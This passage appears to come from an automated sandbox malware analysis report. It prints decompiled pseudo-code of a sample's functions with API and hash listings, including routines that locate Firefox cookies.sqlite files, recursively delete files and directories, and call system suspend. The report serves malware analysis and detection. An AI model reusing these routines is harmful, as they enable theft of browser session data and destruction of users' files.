                    						if((_v740.dwFileAttributes & 0x00000010) == 0) {
                    							continue;
                    						} else {
                    							_t39 = E0043F32F( &(_v740.cFileName),  &(_v740.cFileName), 0x465510);
                    							__eflags = _t39;
                    							if(_t39 == 0) {
                    								continue;
                    							} else {
                    								_t41 = E0043F32F( &(_v740.cFileName),  &(_v740.cFileName), L"..");
                    								__eflags = _t41;
                    								if(_t41 == 0) {
                    									continue;
                    								} else {
                    									_t42 = E0040417E(_t61,  &_v148, _t91, _t96, L"\\cookies.sqlite");
                    									_t91 = E00409082( &_v124,  &_v28, _t96,  &(_v740.cFileName));
                    									E00402FA5( &_v52, _t44, _t42);
                    									E00401F09();
                    									E00401F09();
                    									__eflags = PathFileExistsW(E00401F04( &_v52));
                    									if(__eflags != 0) {
                    										FindClose(_t94);
                    										E00403262(_t61, _t95, _t96, __eflags,  &_v52);
                    										E00401F09();
                    									} else {
                    										E00401F09();
                    										continue;
                    									}
                    								}
                    							}
                    						}
                    						L10:
                    						E00401FD8();
                    						goto L11;
                    					}
                    					FindClose(_t94);
                    					E0040417E(_t61, _t95, _t91, _t96, 0x46b928);
                    					goto L10;
                    				} else {
                    					E0040417E(_t61, _t95,  &_v28, _t96, 0x46b928);
                    				}
                    				L11:
                    				E00401F09();
                    				return _t95;
                    			}




















                    0x0040c1c2
                    0x0040c1d2
                    0x0040c1de
                    0x0040c1eb
                    0x0040c1fc
                    0x0040c219
                    0x0040c21b
                    0x0040c223
                    0x0040c239
                    0x0040c2db
                    0x0040c2e3
                    0x0040c2e9
                    0x0040c2eb
                    0x00000000
                    0x00000000
                    0x0040c243
                    0x0040c24a
                    0x00000000
                    0x0040c250
                    0x0040c25c
                    0x0040c263
                    0x0040c265
                    0x00000000
                    0x0040c267
                    0x0040c273
                    0x0040c27a
                    0x0040c27c
                    0x00000000
                    0x0040c27e
                    0x0040c289
                    0x0040c2a2
                    0x0040c2a7
                    0x0040c2b0
                    0x0040c2bb
                    0x0040c2cf
                    0x0040c2d1
                    0x0040c31d
                    0x0040c329
                    0x0040c331
                    0x0040c2d3
                    0x0040c2d6
                    0x00000000
                    0x0040c2d6
                    0x0040c2d1
                    0x0040c27c
                    0x0040c265
                    0x0040c304
                    0x0040c307
                    0x00000000
                    0x0040c307
                    0x0040c2f2
                    0x0040c2ff
                    0x00000000
                    0x0040c225
                    0x0040c22c
                    0x0040c22c
                    0x0040c30c
                    0x0040c30f
                    0x0040c31b

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C210
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C2E3
                    • FindClose.KERNEL32(00000000), ref: 0040C2F2
                    • FindClose.KERNEL32(00000000), ref: 0040C31D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 1164774033-405221262
                    • Opcode ID: 9a9fc8888c0c7a3a639baea4b5cd5a8f4717963969a344bed0a869429bce14e2
                    • Instruction ID: 93c152be5cd40cf49385a1897214613255455c66cd65654c2cdd3e7f84d31011
                    • Opcode Fuzzy Hash: 9a9fc8888c0c7a3a639baea4b5cd5a8f4717963969a344bed0a869429bce14e2
                    • Instruction Fuzzy Hash: 5931823190021A96CB14E7A1DC9ADEE7779AF50309F50017FB505B20E2FF789A898A4D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041BD26(WCHAR* __ecx, void* __edx) {
                    				short _v524;
                    				short _v1044;
                    				struct _WIN32_FIND_DATAW _v1636;
                    				int _t41;
                    				long _t42;
                    				int _t51;
                    				signed int _t60;
                    				void* _t70;
                    				WCHAR* _t71;
                    				void* _t72;
                    
                    				_t70 = __edx;
                    				_t71 = __ecx;
                    				E0043F1E4( &_v1044, __ecx);
                    				E0043F206( &_v1044, L"\\*");
                    				E0043F1E4( &_v524, _t71);
                    				E0043F206( &_v524, "\\");
                    				_t72 = FindFirstFileW( &_v1044,  &_v1636);
                    				if(_t72 == 0xffffffff) {
                    					L16:
                    					__eflags = 0;
                    					return 0;
                    				}
                    				E0043F1E4( &_v1044,  &_v524);
                    				_t60 = 1;
                    				do {
                    					_t41 = FindNextFileW(_t72,  &_v1636);
                    					_t76 = _t41;
                    					if(_t41 == 0) {
                    						_t42 = GetLastError();
                    						__eflags = _t42 - 0x12;
                    						if(_t42 != 0x12) {
                    							L15:
                    							FindClose(_t72);
                    							goto L16;
                    						}
                    						_t60 = 0;
                    						__eflags = 0;
                    						goto L13;
                    					}
                    					if(E0041BCF8( &(_v1636.cFileName), _t76) != 0) {
                    						goto L13;
                    					}
                    					E0043F206( &_v524,  &(_v1636.cFileName));
                    					if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                    						__eflags = _v1636.dwFileAttributes & 0x00000001;
                    						if((_v1636.dwFileAttributes & 0x00000001) != 0) {
                    							SetFileAttributesW( &_v524, 0x80);
                    						}
                    						_t51 = DeleteFileW( &_v524);
                    						__eflags = _t51;
                    						if(_t51 == 0) {
                    							goto L15;
                    						} else {
                    							L10:
                    							E0043F1E4( &_v524,  &_v1044);
                    							goto L13;
                    						}
                    					}
                    					if(E0041BD26( &_v524, _t70) == 0) {
                    						goto L15;
                    					}
                    					RemoveDirectoryW( &_v524);
                    					goto L10;
                    					L13:
                    				} while (_t60 != 0);
                    				FindClose(_t72);
                    				return RemoveDirectoryW(_t71);
                    			}













                    0x0041bd26
                    0x0041bd38
                    0x0041bd3c
                    0x0041bd4d
                    0x0041bd5a
                    0x0041bd6b
                    0x0041bd87
                    0x0041bd8c
                    0x0041be7d
                    0x0041be7d
                    0x00000000
                    0x0041be7d
                    0x0041bda0
                    0x0041bda7
                    0x0041bda9
                    0x0041bdb1
                    0x0041bdb7
                    0x0041bdb9
                    0x0041be51
                    0x0041be57
                    0x0041be5a
                    0x0041be76
                    0x0041be77
                    0x00000000
                    0x0041be77
                    0x0041be5c
                    0x0041be5c
                    0x00000000
                    0x0041be5c
                    0x0041bdcc
                    0x00000000
                    0x00000000
                    0x0041bde0
                    0x0041bdee
                    0x0041be0e
                    0x0041be15
                    0x0041be23
                    0x0041be23
                    0x0041be30
                    0x0041be36
                    0x0041be38
                    0x00000000
                    0x0041be3a
                    0x0041be3a
                    0x0041be48
                    0x00000000
                    0x0041be4e
                    0x0041be38
                    0x0041bdfd
                    0x00000000
                    0x00000000
                    0x0041be06
                    0x00000000
                    0x0041be5e
                    0x0041be5e
                    0x0041be67
                    0x00000000

                    APIs
                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BD81
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BDB1
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE23
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE30
                      • Part of subcall function 0041BD26: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE06
                    • GetLastError.KERNEL32(?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE51
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE67
                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE6E
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004742C0,004742D8,00000001), ref: 0041BE77
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                    • String ID:
                    • API String ID: 2341273852-0
                    • Opcode ID: cfc0d51d04cc8e48e00ab094d657236e11be4846676a9920e90c860c892d0e39
                    • Instruction ID: a2878bbf3bd3973d2eefffc78c355f36ea252ee93d43807a3055f8d14db4cb96
                    • Opcode Fuzzy Hash: cfc0d51d04cc8e48e00ab094d657236e11be4846676a9920e90c860c892d0e39
                    • Instruction Fuzzy Hash: 00313D7680031C9ADB20EA61DC49EDB77ACEB14305F0405FBF655E2051EF39DAC88A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0041958A(char* __edx, void* __eflags, char _a8) {
                    				struct _WIN32_FIND_DATAW _v1028;
                    				char _v1036;
                    				char _v1064;
                    				char _v1088;
                    				void* _v1092;
                    				char _v1100;
                    				char _v1116;
                    				void* _v1120;
                    				char _v1128;
                    				char _v1136;
                    				char _v1152;
                    				char _v1156;
                    				char _v1160;
                    				void* _v1164;
                    				char _v1172;
                    				char _v1176;
                    				void* _v1188;
                    				char _v1196;
                    				void* _v1200;
                    				void* _v1204;
                    				char _v1208;
                    				char _v1220;
                    				char _v1224;
                    				char _v1228;
                    				char _v1232;
                    				char _v1236;
                    				char _v1240;
                    				char _v1252;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t63;
                    				int _t85;
                    				int _t91;
                    				void* _t102;
                    				void* _t109;
                    				char* _t113;
                    				void* _t115;
                    				void* _t116;
                    				void* _t130;
                    				void* _t133;
                    				void* _t228;
                    				void* _t229;
                    				void* _t234;
                    				signed int _t235;
                    				void* _t238;
                    				void* _t239;
                    				void* _t240;
                    				void* _t243;
                    
                    				_t243 = __eflags;
                    				_t213 = __edx;
                    				_push(_t139);
                    				_t63 = E00401FAB( &_a8);
                    				E004041A2( &_a8,  &_v1100, 4, 0xffffffff);
                    				_t238 = (_t235 & 0xfffffff8) - 0x4b4;
                    				E004020F6(_t139, _t238, __edx, _t243, 0x473ec8);
                    				_t239 = _t238 - 0x18;
                    				E004020F6(_t139, _t239, __edx, _t243,  &_v1116);
                    				E0041B8B0( &_v1252, _t213);
                    				_t240 = _t239 + 0x30;
                    				_t228 =  *_t63 - 0x19;
                    				if(_t228 == 0) {
                    					E004020DF(_t139,  &_v1220);
                    					_t213 = 0x4746b0;
                    					E00409082( &_v1172, 0x4746b0, _t234, L"\\*");
                    					_t229 = FindFirstFileW(E00401F04( &_v1172),  &_v1028);
                    					__eflags = _t229 - 0xffffffff;
                    					if(__eflags == 0) {
                    						L14:
                    						E004020F6(_t139, _t240 - 0x18, _t213, __eflags,  &_v1220);
                    						_push(0x5d);
                    						E00404AA1(0x474838, _t213, __eflags);
                    						E00401F09();
                    						E00401FD8();
                    						goto L15;
                    					}
                    					E0040417E(_t139,  &_v1196, 0x4746b0, _t234,  &(_v1028.cFileName));
                    					_t213 = 0x465510;
                    					_t85 = E004076DE(__eflags);
                    					_t139 = _t85;
                    					E00401F09();
                    					__eflags = _t85;
                    					if(__eflags != 0) {
                    						E00401FE2( &_v1228, 0x465510, _t229, E004020B7(_t139,  &_v1196, 0x465510, _t234, __eflags,  &_v1028, 0x250));
                    						E00401FD8();
                    					}
                    					while(1) {
                    						__eflags = FindNextFileW(_t229,  &_v1028);
                    						if(__eflags == 0) {
                    							goto L14;
                    						}
                    						E0040417E(_t139,  &_v1196, _t213, _t234,  &(_v1028.cFileName));
                    						_t213 = L"..";
                    						_t91 = E004076DE(__eflags);
                    						_t139 = _t91;
                    						E00401F09();
                    						__eflags = _t91;
                    						if(__eflags != 0) {
                    							L00403376(E004020B7(_t139,  &_v1196, L"..", _t234, __eflags,  &_v1028, 0x250));
                    							E00401FD8();
                    						}
                    					}
                    					goto L14;
                    				} else {
                    					_t245 = _t228 == 1;
                    					if(_t228 == 1) {
                    						_t102 = E0041B6F3( &_v1152, E00401E65( &_v1232, _t213, _t234, _t245, 1));
                    						E00402FA5( &_v1176, E00409082( &_v1128, 0x4746b0, _t234, "\\"), _t102);
                    						E00401F09();
                    						E00401F09();
                    						E004020DF(_t139,  &_v1224);
                    						E00401F04( &_v1176);
                    						_t213 =  &_v1224;
                    						_t109 = E0041BF1A( &_v1224);
                    						_t246 = _t109;
                    						if(_t109 != 0) {
                    							_t113 = E00401FAB(E00401E65(0x4740cc,  &_v1224, _t234, _t246, 0x1b));
                    							_t247 =  *_t113 - 1;
                    							if( *_t113 == 1) {
                    								_t130 = E0040247C();
                    								E00406BDE( &_v1028, E00401FAB(0x474320), _t130);
                    								_t133 = E0040247C();
                    								E00401FE2( &_v1240, _t213, 0x474320, E00406CFF(_t139,  &_v1036, _t213,  &_v1156, E00401FAB( &_v1228), _t133));
                    								E00401FD8();
                    							}
                    							_t115 = E00401E65( &_v1232, _t213, _t234, _t247, 2);
                    							_t116 = E00401E65( &_v1236, _t213, _t234, _t247, 0);
                    							_t213 = E00402F10(_t139,  &_v1160, E00402F10(_t139,  &_v1136, E00402F10(_t139,  &_v1088, E00402F10(_t139,  &_v1064, E00402F31( &_v1208, E00401E65( &_v1240, _t213, _t234, _t247, 1), _t234, 0x473ec8), _t234, _t247, _t116), _t234, _t247, 0x473ec8), _t234, _t247, _t115), _t234, _t247, 0x473ec8);
                    							E00402F10(_t139, _t240 - 0x18, _t122, _t234, _t247,  &_v1220);
                    							_push(0x5e);
                    							E00404AA1(0x474838, _t122, _t247);
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    						}
                    						E00401FD8();
                    						E00401F09();
                    					}
                    					L15:
                    					E00401E8D( &_v1252, _t213);
                    					E00401FD8();
                    					return E00401FD8();
                    				}
                    			}




















































                    0x0041958a
                    0x0041958a
                    0x00419599
                    0x0041959c
                    0x004195b2
                    0x004195b7
                    0x004195c2
                    0x004195c7
                    0x004195d4
                    0x004195dd
                    0x004195e2
                    0x004195e5
                    0x004195e8
                    0x004197b5
                    0x004197bf
                    0x004197c8
                    0x004197e6
                    0x004197e8
                    0x004197eb
                    0x004198b2
                    0x004198bc
                    0x004198c1
                    0x004198c8
                    0x004198d1
                    0x004198da
                    0x00000000
                    0x004198da
                    0x004197fd
                    0x00419802
                    0x00419809
                    0x00419812
                    0x00419814
                    0x00419819
                    0x0041981b
                    0x00419838
                    0x00419841
                    0x00419841
                    0x004198a3
                    0x004198ae
                    0x004198b0
                    0x00000000
                    0x00000000
                    0x0041985a
                    0x0041985f
                    0x00419866
                    0x0041986f
                    0x00419871
                    0x00419876
                    0x00419878
                    0x00419895
                    0x0041989e
                    0x0041989e
                    0x00419878
                    0x00000000
                    0x004195ee
                    0x004195ee
                    0x004195f1
                    0x00419608
                    0x0041962b
                    0x00419635
                    0x0041963e
                    0x00419647
                    0x00419650
                    0x00419655
                    0x0041965b
                    0x00419660
                    0x00419662
                    0x00419676
                    0x0041967b
                    0x0041967e
                    0x00419687
                    0x0041969c
                    0x004196a5
                    0x004196cb
                    0x004196d4
                    0x004196d4
                    0x004196ea
                    0x004196f7
                    0x00419751
                    0x00419755
                    0x0041975b
                    0x00419762
                    0x0041976b
                    0x00419774
                    0x00419780
                    0x0041978c
                    0x00419795
                    0x00419795
                    0x0041979e
                    0x004197a7
                    0x004197a7
                    0x004198df
                    0x004198e3
                    0x004198ef
                    0x00419902
                    0x00419902

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 004197E0
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 004198AC
                      • Part of subcall function 0041BF1A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A6B8), ref: 0041BF33
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$CreateFirstNext
                    • String ID: CG$8HG$8HG$X2}
                    • API String ID: 341183262-2103676596
                    • Opcode ID: c9a7106fe3fc94ea30fbae7781aeae67d49059478be91bce7846cdfc526bc3f1
                    • Instruction ID: 177b47cc106243a77811c4ed7364172968c9e0efcf35dd3979fb2ffe7056854e
                    • Opcode Fuzzy Hash: c9a7106fe3fc94ea30fbae7781aeae67d49059478be91bce7846cdfc526bc3f1
                    • Instruction Fuzzy Hash: FF8182315082419AC314FB22C856EEF73A9AF90348F50493FF546671E2EF789A49C65A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E004516E8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, char _a12) {
                    				intOrPtr* _v8;
                    				short _v12;
                    				signed int _v32;
                    				intOrPtr _v40;
                    				signed int _v52;
                    				char _v272;
                    				short _v292;
                    				void* __ebp;
                    				void* _t34;
                    				short* _t35;
                    				intOrPtr* _t36;
                    				signed int _t39;
                    				signed short* _t44;
                    				intOrPtr _t47;
                    				void* _t49;
                    				signed int _t52;
                    				signed int _t58;
                    				signed int _t60;
                    				signed int _t66;
                    				void* _t68;
                    				void* _t71;
                    				void* _t76;
                    				void* _t80;
                    				intOrPtr _t87;
                    				short* _t89;
                    				void* _t90;
                    				void* _t92;
                    				short _t94;
                    				void* _t95;
                    				intOrPtr* _t98;
                    				void* _t112;
                    				void* _t116;
                    				intOrPtr* _t118;
                    				intOrPtr _t121;
                    				signed int* _t122;
                    				intOrPtr* _t125;
                    				signed short _t127;
                    				int _t129;
                    				signed int _t132;
                    				void* _t133;
                    				signed int _t134;
                    
                    				_t115 = __edx;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_push(__ebx);
                    				_push(__esi);
                    				_push(__edi);
                    				_t34 = E00447C05(__ebx, __ecx, __edx);
                    				_t87 = _a4;
                    				_t94 = 0;
                    				_v12 = 0;
                    				_t3 = _t34 + 0x50; // 0x50
                    				_t125 = _t3;
                    				_t4 = _t125 + 0x250; // 0x2a0
                    				_t35 = _t4;
                    				 *((intOrPtr*)(_t125 + 8)) = 0;
                    				 *_t35 = 0;
                    				_t6 = _t125 + 4; // 0x54
                    				_t118 = _t6;
                    				_v8 = _t35;
                    				_t36 = _t87 + 0x80;
                    				 *_t125 = _t87;
                    				 *_t118 = _t36;
                    				if( *_t36 != 0) {
                    					E00451679("L\xef\xbf\xbdE", 0x16,					_t133 = _t133 + 0xc;
                    					_t94 = 0;
                    				}
                    				_push(_t125);
                    				if( *((intOrPtr*)( *_t125)) == _t94) {
                    					E00450FEA(_t87, _t94, _t115, _t118, __eflags);
                    					goto L12;
                    				} else {
                    					if( *((intOrPtr*)( *_t118)) == _t94) {
                    						E0045110D();
                    					} else {
                    						E00451073(_t94);
                    					}
                    					_pop(_t95);
                    					if( *((intOrPtr*)(_t125 + 8)) == 0) {
                    						_t80 = E00451679(0x45ef10, 0x40, _t125);
                    						_t133 = _t133 + 0xc;
                    						if(_t80 != 0) {
                    							_push(_t125);
                    							if( *((intOrPtr*)( *_t118)) == 0) {
                    								E0045110D();
                    							} else {
                    								E00451073(0);
                    							}
                    							L12:
                    							_pop(_t95);
                    						}
                    					}
                    				}
                    				if( *((intOrPtr*)(_t125 + 8)) == 0) {
                    					L31:
                    					_t39 = 0;
                    					__eflags = 0;
                    					goto L32;
                    				} else {
                    					_t127 = E00451547(_t95, _t87 + 0x100, _t125);
                    					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
                    						goto L31;
                    					} else {
                    						_t44 = _a8;
                    						if(_t44 != 0) {
                    							 *_t44 = _t127;
                    						}
                    						_t13 =  &_a12; // 0x444465
                    						_t121 =  *_t13;
                    						if(_t121 == 0) {
                    							L30:
                    							_t39 = 1;
                    							goto L32;
                    						} else {
                    							_t98 = _v8;
                    							_t89 = _t121 + 0x120;
                    							 *_t89 = 0;
                    							_t116 = _t98 + 2;
                    							do {
                    								_t47 =  *_t98;
                    								_t98 = _t98 + 2;
                    							} while (_t47 != _v12);
                    							_t100 = _t98 - _t116 >> 1;
                    							_push((_t98 - _t116 >> 1) + 1);
                    							_t49 = E0044FAD9(_t98 - _t116 >> 1, _t89, 0x55, _v8);
                    							_t134 = _t133 + 0x10;
                    							_t153 = _t49;
                    							if(_t49 != 0) {
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								E0043B6DD();
                    								asm("int3");
                    								_t132 = _t134;
                    								_t52 =  *0x47000c; // 0xc3a97826
                    								_v52 = _t52 ^ _t132;
                    								_push(_t89);
                    								_push(_t127);
                    								_push(_t121);
                    								_t90 = E00447C05(_t89, _t100, _t116);
                    								_t122 =  *(E00447C05(_t90, _t100, _t116) + 0x34c);
                    								_t129 = E00451DFB(_v40);
                    								asm("sbb ecx, ecx");
                    								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                    								__eflags = _t58;
                    								if(_t58 != 0) {
                    									_t60 = E00453424(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
                    									__eflags = _t60;
                    									if(_t60 == 0) {
                    										_t66 = E00451F2F(_t129);
                    										__eflags = _t66;
                    										if(_t66 != 0) {
                    											 *_t122 =  *_t122 | 0x00000004;
                    											__eflags =  *_t122;
                    											_t122[2] = _t129;
                    											_t122[1] = _t129;
                    										}
                    									}
                    									__eflags =  !( *_t122 >> 2) & 0x00000001;
                    								} else {
                    									 *_t122 =  *_t122 & _t58;
                    								}
                    								__eflags = _v32 ^ _t132;
                    								return E004349BB(_v32 ^ _t132);
                    							} else {
                    								_t68 = E004482FC(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
                    								_t154 = _t68;
                    								if(_t68 == 0) {
                    									goto L31;
                    								} else {
                    									_t92 = _t121 + 0x80;
                    									if(E004482FC(_t100, _t127, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
                    										goto L31;
                    									} else {
                    										_push(0x5f);
                    										_t71 = E00457387(_t100);
                    										_t112 = _t92;
                    										if(_t71 != 0) {
                    											L28:
                    											if(E004482FC(_t112, _t127, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
                    												goto L31;
                    											} else {
                    												goto L29;
                    											}
                    										} else {
                    											_push(0x2e);
                    											_t76 = E00457387(_t112);
                    											_t112 = _t92;
                    											_t157 = _t76;
                    											if(_t76 == 0) {
                    												L29:
                    												E004418CF(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
                    												goto L30;
                    											} else {
                    												goto L28;
                    											}
                    										}
                    									}
                    								}
                    								L32:
                    								return _t39;
                    							}
                    						}
                    					}
                    				}
                    			}












































                    0x004516e8
                    0x004516ed
                    0x004516ee
                    0x004516ef
                    0x004516f0
                    0x004516f1
                    0x004516f2
                    0x004516f7
                    0x004516fa
                    0x004516fc
                    0x004516ff
                    0x004516ff
                    0x00451702
                    0x00451702
                    0x00451708
                    0x0045170b
                    0x0045170e
                    0x0045170e
                    0x00451711
                    0x00451714
                    0x0045171a
                    0x0045171c
                    0x00451721
                    0x0045172b
                    0x00451730
                    0x00451733
                    0x00451733
                    0x00451737
                    0x0045173b
                    0x00451784
                    0x00000000
                    0x0045173d
                    0x00451742
                    0x0045174b
                    0x00451744
                    0x00451744
                    0x00451744
                    0x00451752
                    0x00451756
                    0x00451760
                    0x00451765
                    0x0045176a
                    0x00451770
                    0x00451774
                    0x0045177d
                    0x00451776
                    0x00451776
                    0x00451776
                    0x00451789
                    0x00451789
                    0x00451789
                    0x0045176a
                    0x00451756
                    0x0045178f
                    0x004518a1
                    0x004518a1
                    0x004518a1
                    0x00000000
                    0x00451795
                    0x004517a2
                    0x004517a8
                    0x00000000
                    0x004517d8
                    0x004517d8
                    0x004517dd
                    0x004517df
                    0x004517df
                    0x004517e1
                    0x004517e1
                    0x004517e6
                    0x0045189c
                    0x0045189e
                    0x00000000
                    0x004517ec
                    0x004517ec
                    0x004517ef
                    0x004517f7
                    0x004517fa
                    0x004517fd
                    0x004517fd
                    0x00451800
                    0x00451803
                    0x0045180b
                    0x00451810
                    0x00451817
                    0x0045181c
                    0x0045181f
                    0x00451821
                    0x004518ac
                    0x004518ad
                    0x004518ae
                    0x004518af
                    0x004518b0
                    0x004518b1
                    0x004518b6
                    0x004518ba
                    0x004518c2
                    0x004518c9
                    0x004518cc
                    0x004518cd
                    0x004518d1
                    0x004518d7
                    0x004518df
                    0x004518ee
                    0x004518fa
                    0x0045190b
                    0x00451911
                    0x00451913
                    0x00451924
                    0x0045192b
                    0x0045192d
                    0x00451930
                    0x00451936
                    0x00451938
                    0x0045193a
                    0x0045193a
                    0x0045193d
                    0x00451940
                    0x00451940
                    0x00451938
                    0x0045194a
                    0x00451915
                    0x00451915
                    0x00451917
                    0x00451952
                    0x0045195d
                    0x00451827
                    0x00451830
                    0x00451835
                    0x00451837
                    0x00000000
                    0x00451839
                    0x0045183b
                    0x00451855
                    0x00000000
                    0x00451857
                    0x00451857
                    0x0045185a
                    0x00451860
                    0x00451863
                    0x00451873
                    0x00451886
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00451865
                    0x00451865
                    0x00451868
                    0x0045186e
                    0x0045186f
                    0x00451871
                    0x00451888
                    0x00451894
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00451871
                    0x00451863
                    0x00451855
                    0x004518a3
                    0x004518a9
                    0x004518a9
                    0x00451821
                    0x004517e6
                    0x004517a8

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444465,?,?,?,?,00443EBC,?,00000004), ref: 004517CA
                    • _wcschr.LIBVCRUNTIME ref: 0045185A
                    • _wcschr.LIBVCRUNTIME ref: 00451868
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,eDD,00000000,?), ref: 0045190B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                    • String ID: LE$eDD
                    • API String ID: 4212172061-3771532673
                    • Opcode ID: 76a4bbbd9be84b0080220bed881dc31422a8a0dda963748f1290fd43d0a2b7b7
                    • Instruction ID: 7bd1add96e115002f42ff4b1ae4b7d28806996e86f434b718358e085dd9a36e0
                    • Opcode Fuzzy Hash: 76a4bbbd9be84b0080220bed881dc31422a8a0dda963748f1290fd43d0a2b7b7
                    • Instruction Fuzzy Hash: AC61E875500205ABD724AB75CC82BAB73A8EF08316F14046FFD05D7293EB78E949C769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E004163CA(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a152, void* _a176) {
                    				void* _t12;
                    				int _t14;
                    				int _t20;
                    				int _t22;
                    				int _t31;
                    				intOrPtr* _t64;
                    				void* _t69;
                    
                    				_t69 = __eflags;
                    				E004173E7();
                    				E00401E65( &_a16, __edx, __ebp, _t69, 0);
                    				_t12 = E00405B05("0");
                    				_push(0);
                    				_t70 = _t12;
                    				if(_t12 == 0) {
                    					E00401E65( &_a12, "0", __ebp, __eflags);
                    					_t14 = E00405B05("1");
                    					_push(0);
                    					__eflags = _t14;
                    					if(__eflags == 0) {
                    						E00401E65( &_a12, "1", __ebp, __eflags);
                    						__eflags = E00405B05("2");
                    						if(__eflags == 0) {
                    							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
                    							E00401E65( &_a16, "2", __ebp, __eflags, 0);
                    							_t62 = "3";
                    							_t20 = E00405B05("3");
                    							_push(0);
                    							__eflags = _t20;
                    							if(__eflags == 0) {
                    								E00401E65( &_a16, "3", __ebp, __eflags);
                    								_t62 = "4";
                    								_t22 = E00405B05("4");
                    								__eflags = _t22;
                    								if(_t22 != 0) {
                    									_push(0);
                    									_push(0);
                    									_push(1);
